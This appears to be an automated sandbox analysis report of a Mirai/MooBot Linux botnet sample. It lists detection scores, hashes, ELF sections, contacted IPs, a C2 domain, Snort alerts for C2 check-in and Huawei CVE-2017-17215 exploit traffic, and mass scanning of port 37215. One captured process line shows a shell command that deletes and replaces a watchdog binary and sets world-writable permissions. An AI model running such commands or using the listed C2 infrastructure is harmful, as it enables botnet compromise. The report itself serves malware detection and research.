          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830702 Sample: v8OWS3Ylfj.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 18 test.zxyes.xyz 2->18 20 41.204.140.235 Zantel-ASTZ Tanzania United Republic of 2->20 22 99 other IPs or domains 2->22 24 Snort IDS alert for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 5 other signatures 2->30 8 v8OWS3Ylfj.elf 2->8         started        signatures3 process4 process5 10 v8OWS3Ylfj.elf 8->10         started        12 v8OWS3Ylfj.elf sh 8->12         started        process6 14 v8OWS3Ylfj.elf 10->14         started        16 v8OWS3Ylfj.elf 10->16         started       

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          v8OWS3Ylfj.elf57%VirustotalBrowse
          v8OWS3Ylfj.elf59%ReversingLabsLinux.Trojan.LnxMirai
          v8OWS3Ylfj.elf100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          test.zxyes.xyz2%VirustotalBrowse

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          test.zxyes.xyz
          		195.133.40.202
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/v8OWS3Ylfj.elffalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/v8OWS3Ylfj.elffalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              197.116.97.50
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              41.122.250.100
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              41.158.229.80
              		unknownGabon
              		16058Gabon-TelecomGAfalse
              157.202.176.43
              		unknownUnited States
              		1759TSF-IP-CORETeliaFinlandOyjEUfalse
              162.153.29.187
              		unknownUnited States
              		10796TWC-10796-MIDWESTUSfalse
              41.78.111.29
              		unknownSudan
              		37211MAX-NET-FOR-INTERNET-SERVICESSDfalse
              157.57.242.60
              		unknownUnited States
              		3598MICROSOFT-CORP-ASUSfalse
              157.86.112.180
              		unknownBrazil
              		21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
              157.71.207.91
              		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
              197.206.187.63
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              197.203.147.109
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.112.136.32
              		unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
              154.241.231.35
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              197.254.120.33
              		unknownKenya
              		15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
              157.202.176.45
              		unknownUnited States
              		1759TSF-IP-CORETeliaFinlandOyjEUfalse
              157.240.97.103
              		unknownUnited States
              		32934FACEBOOKUSfalse
              191.71.196.136
              		unknownColombia
              		26611COMCELSACOfalse
              41.240.27.36
              		unknownSudan
              		36998SDN-MOBITELSDfalse
              90.158.197.168
              		unknownTurkey
              		9021ISNETTRfalse
              159.65.206.40
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUSfalse
              1.41.26.120
              		unknownAustralia
              		4804MPX-ASMicroplexPTYLTDAUfalse
              157.229.129.223
              		unknownUnited States
              		122UPMC-AS122USfalse
              157.80.125.244
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              41.214.230.4
              		unknownMorocco
              		36925ASMediMAfalse
              157.62.20.95
              		unknownUnited States
              		22192SSHENETUSfalse
              157.74.162.171
              		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
              146.233.213.243
              		unknownUnited States
              		53527COUNTY-OF-LOS-ANGELES-SHERIFFS-DEPARTMENTUSfalse
              197.30.214.19
              		unknownTunisia
              		37492ORANGE-TNfalse
              41.240.108.63
              		unknownSudan
              		36998SDN-MOBITELSDfalse
              102.105.183.19
              		unknownTunisia
              		37693TUNISIANATNfalse
              197.221.108.123
              		unknownSouth Africa
              		37236Reflex-SolutionsZAfalse
              41.102.124.94
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              41.186.110.64
              		unknownRwanda
              		36890MTNRW-ASNRWfalse
              41.158.143.123
              		unknownGabon
              		16058Gabon-TelecomGAfalse
              41.108.235.41
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.91.221.202
              		unknownUnited States
              		1767ILIGHT-NETUSfalse
              197.23.201.49
              		unknownTunisia
              		37693TUNISIANATNfalse
              108.13.86.247
              		unknownUnited States
              		5650FRONTIER-FRTRUSfalse
              77.226.252.166
              		unknownSpain
              		12430VODAFONE_ESESfalse
              146.124.59.136
              		unknownGreece
              		3260INTRACOMGRfalse
              41.232.55.184
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              219.202.15.245
              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              157.148.116.78
              		unknownChina
              		136958UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCNfalse
              157.24.67.210
              		unknownFinland
              		1741FUNETASFIfalse
              41.244.252.243
              		unknownCameroon
              		37620VIETTEL-CM-ASCMfalse
              41.23.191.240
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              41.47.7.55
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              197.180.119.67
              		unknownKenya
              		33771SAFARICOM-LIMITEDKEfalse
              157.157.39.79
              		unknownIceland
              		6677ICENET-AS1ISfalse
              157.252.160.112
              		unknownUnited States
              		3592TRINCOLL-ASUSfalse
              197.58.116.239
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              197.158.15.113
              		unknownMozambique
              		30619TDM-ASMZfalse
              197.53.119.213
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              211.175.167.21
              		unknownKorea Republic of
              		9457DREAMX-ASDREAMLINECOKRfalse
              85.199.145.238
              		unknownGermany
              		25560RHTEC-ASrh-tecIPBackboneDEfalse
              157.227.16.98
              		unknownAustralia
              		4704SANNETRakutenMobileIncJPfalse
              1.170.61.234
              		unknownTaiwan; Republic of China (ROC)
              		3462HINETDataCommunicationBusinessGroupTWfalse
              197.46.254.215
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              121.94.172.86
              		unknownJapan2510INFOWEBFUJITSULIMITEDJPfalse
              132.147.143.250
              		unknownUnited States
              		11776ATLANTICBB-JOHNSTOWNUSfalse
              197.42.235.247
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.204.140.235
              		unknownTanzania United Republic of
              		36930Zantel-ASTZfalse
              213.89.240.214
              		unknownSweden
              		39651COMHEM-SWEDENSEfalse
              191.41.153.32
              		unknownBrazil
              		7738TelemarNorteLesteSABRfalse
              197.25.176.170
              		unknownTunisia
              		37671GLOBALNET-ASTNfalse
              197.225.3.139
              		unknownMauritius
              		23889MauritiusTelecomMUfalse
              110.251.172.54
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              197.53.119.223
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              157.164.123.130
              		unknownBelgium
              		49964VERIXI-BACKUPNETWORKBEfalse
              197.89.135.46
              		unknownSouth Africa
              		10474OPTINETZAfalse
              217.8.241.179
              		unknownUnited Kingdom
              		20738GD-EMEA-DC-LD5GBfalse
              41.221.123.188
              		unknownunknown
              		36974AFNET-ASCIfalse
              157.74.88.27
              		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
              41.216.185.187
              		unknownSouth Africa
              		40065CNSERVERSUSfalse
              41.91.9.71
              		unknownEgypt
              		33771SAFARICOM-LIMITEDKEfalse
              197.211.78.67
              		unknownSouth Africa
              		29918IMPOL-ASNZAfalse
              157.45.145.241
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              197.174.209.103
              		unknownSouth Africa
              		37168CELL-CZAfalse
              197.204.101.21
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              41.98.89.102
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              197.31.140.147
              		unknownTunisia
              		37492ORANGE-TNfalse
              208.229.94.48
              		unknownUnited States
              		4208THE-ISERV-COMPANYUSfalse
              197.130.198.23
              		unknownMorocco
              		6713IAM-ASMAfalse
              41.228.168.97
              		unknownTunisia
              		37492ORANGE-TNfalse
              197.139.229.118
              		unknownKenya
              		36914KENET-ASKEfalse
              157.180.240.213
              		unknownSweden
              		3301TELIANET-SWEDENTeliaCompanySEfalse
              41.11.91.70
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              157.149.244.2
              		unknownUnited States
              		3464ASC-NETUSfalse
              4.173.232.107
              		unknownUnited States
              		3356LEVEL3USfalse
              41.217.30.150
              		unknownNigeria
              		37340SpectranetNGfalse
              157.240.98.11
              		unknownUnited States
              		32934FACEBOOKUSfalse
              135.239.89.179
              		unknownUnited States
              		10455LUCENT-CIOUSfalse
              157.54.149.249
              		unknownUnited States
              		3598MICROSOFT-CORP-ASUSfalse
              197.88.158.211
              		unknownSouth Africa
              		10474OPTINETZAfalse
              152.217.237.100
              		unknownUnited States
              		30313IRSUSfalse
              197.125.162.90
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              157.56.241.225
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              197.62.75.231
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              157.241.76.144
              		unknownUnited States
              		32934FACEBOOKUSfalse
              145.149.26.3
              		unknownNetherlands
              		1103SURFNET-NLSURFnetTheNetherlandsNLfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.548832915017976
              TrID:
              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
              File name:v8OWS3Ylfj.elf
              File size:55632
              MD5:2b318e2fa59dccaa45cc59c5fea7e082
              SHA1:d5bf527325fbfbda5d26272bb88874bc504dd260
              SHA256:7bbce804ece6b26f0fcf2937fd5217518848f044c95cc6d033f5a08f04598a06
              SHA512:cb9c55ee85b5d0a8d881201cd99b4b998353e58239350d597db1bb5a2ce09bde7a7e72a941a9c6b18fba8cf43a86e837297ca33dfcd8913e86c7715ca4972f66
              SSDEEP:1536:JeESt/basV2rcZhG6ySN7na65lSR9zWOIaEjrqMds:JeESt/basVTgS7na65QRVtXESS
              TLSH:A9436BC4F643D8F5EC8705702077FB379B72E1E922A8D647D3B4D932AC52651EA06A8C
              File Content Preview:.ELF....................d...4...........4. ...(..............................................e...e......H(..........Q.td............................U..S.......w....h........[]...$.............U......=.g...t..5....$e.....$e......u........t....h.T..........

              Static ELF Info

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80480940x940x1c0x00x6AX001
              .textPROGBITS0x80480b00xb00xb4360x00x6AX0016
              .finiPROGBITS0x80534e60xb4e60x170x00x6AX001
              .rodataPROGBITS0x80535000xb5000x1ffc0x00x2A0032
              .ctorsPROGBITS0x80565000xd5000x80x00x3WA004
              .dtorsPROGBITS0x80565080xd5080x80x00x3WA004
              .dataPROGBITS0x80565200xd5200x2600x00x3WA0032
              .bssNOBITS0x80567800xd7800x25c80x00x3WA0032
              .shstrtabSTRTAB0x00xd7800x3e0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80480000x80480000xd4fc0xd4fc6.58750x5R E0x1000.init .text .fini .rodata
              LOAD0xd5000x80565000x80565000x2800x28483.46690x6RW 0x1000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.23195.133.40.20236176569992030490 03/20/23-16:13:48.596290TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3617656999192.168.2.23195.133.40.202
              195.133.40.202192.168.2.2356999361762030489 03/20/23-16:13:53.166618TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699936176195.133.40.202192.168.2.23
              192.168.2.23195.164.211.5057976372152835222 03/20/23-16:13:57.691757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797637215192.168.2.23195.164.211.50

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 20, 2023 16:13:48.130729914 CET42836443192.168.2.2391.189.91.43
              Mar 20, 2023 16:13:48.548531055 CET2260737215192.168.2.23197.51.144.74
              Mar 20, 2023 16:13:48.548536062 CET2260737215192.168.2.23157.91.137.160
              Mar 20, 2023 16:13:48.548562050 CET2260737215192.168.2.2341.38.180.74
              Mar 20, 2023 16:13:48.548583031 CET2260737215192.168.2.2341.157.212.222
              Mar 20, 2023 16:13:48.548630953 CET2260737215192.168.2.23157.18.57.34
              Mar 20, 2023 16:13:48.548635960 CET2260737215192.168.2.2341.120.172.141
              Mar 20, 2023 16:13:48.548655987 CET2260737215192.168.2.2341.79.195.210
              Mar 20, 2023 16:13:48.548682928 CET2260737215192.168.2.23120.82.116.87
              Mar 20, 2023 16:13:48.548687935 CET2260737215192.168.2.2341.88.164.178
              Mar 20, 2023 16:13:48.548692942 CET2260737215192.168.2.2341.171.240.4
              Mar 20, 2023 16:13:48.548707962 CET2260737215192.168.2.2341.193.22.17
              Mar 20, 2023 16:13:48.548757076 CET2260737215192.168.2.2341.102.217.79
              Mar 20, 2023 16:13:48.548768997 CET2260737215192.168.2.23197.183.175.176
              Mar 20, 2023 16:13:48.548779964 CET2260737215192.168.2.23197.141.128.211
              Mar 20, 2023 16:13:48.548866034 CET2260737215192.168.2.23155.230.161.178
              Mar 20, 2023 16:13:48.548919916 CET2260737215192.168.2.23157.25.224.249
              Mar 20, 2023 16:13:48.548924923 CET2260737215192.168.2.23197.122.115.189
              Mar 20, 2023 16:13:48.548933983 CET2260737215192.168.2.23157.19.73.220
              Mar 20, 2023 16:13:48.548935890 CET2260737215192.168.2.23157.5.115.233
              Mar 20, 2023 16:13:48.548938036 CET2260737215192.168.2.23157.28.224.236
              Mar 20, 2023 16:13:48.548938036 CET2260737215192.168.2.23197.231.0.218
              Mar 20, 2023 16:13:48.548940897 CET2260737215192.168.2.23197.47.38.145
              Mar 20, 2023 16:13:48.548979044 CET2260737215192.168.2.2392.37.56.164
              Mar 20, 2023 16:13:48.548979998 CET2260737215192.168.2.23197.56.0.157
              Mar 20, 2023 16:13:48.548981905 CET2260737215192.168.2.23157.8.146.25
              Mar 20, 2023 16:13:48.549000025 CET2260737215192.168.2.23157.35.187.136
              Mar 20, 2023 16:13:48.549016953 CET2260737215192.168.2.23197.81.103.71
              Mar 20, 2023 16:13:48.549027920 CET2260737215192.168.2.23157.101.202.223
              Mar 20, 2023 16:13:48.549041033 CET2260737215192.168.2.23213.128.219.251
              Mar 20, 2023 16:13:48.549060106 CET2260737215192.168.2.2399.138.91.131
              Mar 20, 2023 16:13:48.549066067 CET2260737215192.168.2.2341.248.109.221
              Mar 20, 2023 16:13:48.549093962 CET2260737215192.168.2.23193.117.98.153
              Mar 20, 2023 16:13:48.549110889 CET2260737215192.168.2.23157.213.207.202
              Mar 20, 2023 16:13:48.549869061 CET2260737215192.168.2.2361.148.151.19
              Mar 20, 2023 16:13:48.549886942 CET2260737215192.168.2.23197.33.230.87
              Mar 20, 2023 16:13:48.549886942 CET2260737215192.168.2.2341.234.10.177
              Mar 20, 2023 16:13:48.549905062 CET2260737215192.168.2.2341.55.147.79
              Mar 20, 2023 16:13:48.549920082 CET2260737215192.168.2.23157.184.221.36
              Mar 20, 2023 16:13:48.549936056 CET2260737215192.168.2.2341.147.100.17
              Mar 20, 2023 16:13:48.549937010 CET2260737215192.168.2.23197.201.119.217
              Mar 20, 2023 16:13:48.549957991 CET2260737215192.168.2.23197.146.203.132
              Mar 20, 2023 16:13:48.549973011 CET2260737215192.168.2.23157.16.36.193
              Mar 20, 2023 16:13:48.549978971 CET2260737215192.168.2.23147.203.32.94
              Mar 20, 2023 16:13:48.549994946 CET2260737215192.168.2.2341.11.65.191
              Mar 20, 2023 16:13:48.550004005 CET2260737215192.168.2.23157.170.214.155
              Mar 20, 2023 16:13:48.550017118 CET2260737215192.168.2.23157.59.163.2
              Mar 20, 2023 16:13:48.550035954 CET2260737215192.168.2.23183.9.177.103
              Mar 20, 2023 16:13:48.550050974 CET2260737215192.168.2.2359.35.85.25
              Mar 20, 2023 16:13:48.550096989 CET2260737215192.168.2.2336.163.108.31
              Mar 20, 2023 16:13:48.550111055 CET2260737215192.168.2.2341.177.90.248
              Mar 20, 2023 16:13:48.550126076 CET2260737215192.168.2.23197.99.205.227
              Mar 20, 2023 16:13:48.550287008 CET2260737215192.168.2.23157.54.190.198
              Mar 20, 2023 16:13:48.550292015 CET2260737215192.168.2.2331.150.50.232
              Mar 20, 2023 16:13:48.550313950 CET2260737215192.168.2.2341.168.170.75
              Mar 20, 2023 16:13:48.550324917 CET2260737215192.168.2.23157.106.170.154
              Mar 20, 2023 16:13:48.550338030 CET2260737215192.168.2.23189.18.29.223
              Mar 20, 2023 16:13:48.550348043 CET2260737215192.168.2.23157.144.211.229
              Mar 20, 2023 16:13:48.550364017 CET2260737215192.168.2.23157.219.192.119
              Mar 20, 2023 16:13:48.550376892 CET2260737215192.168.2.23197.55.226.81
              Mar 20, 2023 16:13:48.550401926 CET2260737215192.168.2.23197.89.74.28
              Mar 20, 2023 16:13:48.550406933 CET2260737215192.168.2.23197.19.239.174
              Mar 20, 2023 16:13:48.550425053 CET2260737215192.168.2.23197.209.76.165
              Mar 20, 2023 16:13:48.550443888 CET2260737215192.168.2.2341.92.58.186
              Mar 20, 2023 16:13:48.550451994 CET2260737215192.168.2.2341.188.71.247
              Mar 20, 2023 16:13:48.550472021 CET2260737215192.168.2.23110.130.116.251
              Mar 20, 2023 16:13:48.550482035 CET2260737215192.168.2.23157.222.60.88
              Mar 20, 2023 16:13:48.550489902 CET2260737215192.168.2.23197.15.100.200
              Mar 20, 2023 16:13:48.550515890 CET2260737215192.168.2.23157.122.22.2
              Mar 20, 2023 16:13:48.550520897 CET2260737215192.168.2.2341.155.190.194
              Mar 20, 2023 16:13:48.550540924 CET2260737215192.168.2.23197.18.240.69
              Mar 20, 2023 16:13:48.550548077 CET2260737215192.168.2.23115.155.75.22
              Mar 20, 2023 16:13:48.550558090 CET2260737215192.168.2.2382.245.165.66
              Mar 20, 2023 16:13:48.550570965 CET2260737215192.168.2.23222.186.16.117
              Mar 20, 2023 16:13:48.550606966 CET2260737215192.168.2.23157.163.68.182
              Mar 20, 2023 16:13:48.550672054 CET2260737215192.168.2.2341.240.254.22
              Mar 20, 2023 16:13:48.550678968 CET2260737215192.168.2.2341.254.176.123
              Mar 20, 2023 16:13:48.550685883 CET2260737215192.168.2.23115.239.103.58
              Mar 20, 2023 16:13:48.550704002 CET2260737215192.168.2.2341.116.248.106
              Mar 20, 2023 16:13:48.550719976 CET2260737215192.168.2.23157.142.0.23
              Mar 20, 2023 16:13:48.550733089 CET2260737215192.168.2.2341.100.137.54
              Mar 20, 2023 16:13:48.550744057 CET2260737215192.168.2.23158.32.13.230
              Mar 20, 2023 16:13:48.550744057 CET2260737215192.168.2.23206.83.152.134
              Mar 20, 2023 16:13:48.550754070 CET2260737215192.168.2.23157.189.166.168
              Mar 20, 2023 16:13:48.550772905 CET2260737215192.168.2.2345.51.153.5
              Mar 20, 2023 16:13:48.550780058 CET2260737215192.168.2.23197.217.29.152
              Mar 20, 2023 16:13:48.550801039 CET2260737215192.168.2.23157.125.80.49
              Mar 20, 2023 16:13:48.550810099 CET2260737215192.168.2.2336.23.109.50
              Mar 20, 2023 16:13:48.550816059 CET2260737215192.168.2.23222.6.115.126
              Mar 20, 2023 16:13:48.550827980 CET2260737215192.168.2.23157.66.96.169
              Mar 20, 2023 16:13:48.550844908 CET2260737215192.168.2.23157.243.119.140
              Mar 20, 2023 16:13:48.550860882 CET2260737215192.168.2.23158.34.191.176
              Mar 20, 2023 16:13:48.550880909 CET2260737215192.168.2.23157.215.210.73
              Mar 20, 2023 16:13:48.550887108 CET2260737215192.168.2.23157.94.125.1
              Mar 20, 2023 16:13:48.550900936 CET2260737215192.168.2.23109.212.49.131
              Mar 20, 2023 16:13:48.550914049 CET2260737215192.168.2.23197.37.13.136
              Mar 20, 2023 16:13:48.550919056 CET2260737215192.168.2.23197.163.252.112
              Mar 20, 2023 16:13:48.550931931 CET2260737215192.168.2.23197.240.151.20
              Mar 20, 2023 16:13:48.550945997 CET2260737215192.168.2.2341.160.133.122
              Mar 20, 2023 16:13:48.550961971 CET2260737215192.168.2.23157.62.138.220

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 20, 2023 16:13:48.544802904 CET192.168.2.238.8.8.80x5fafStandard query (0)test.zxyes.xyzA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 20, 2023 16:13:48.568625927 CET8.8.8.8192.168.2.230x5fafNo error (0)test.zxyes.xyz195.133.40.202A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time:16:13:47
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:/tmp/v8OWS3Ylfj.elf
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              General

              Start time:16:13:47
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              General

              Start time:16:13:47
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              General

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              General

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082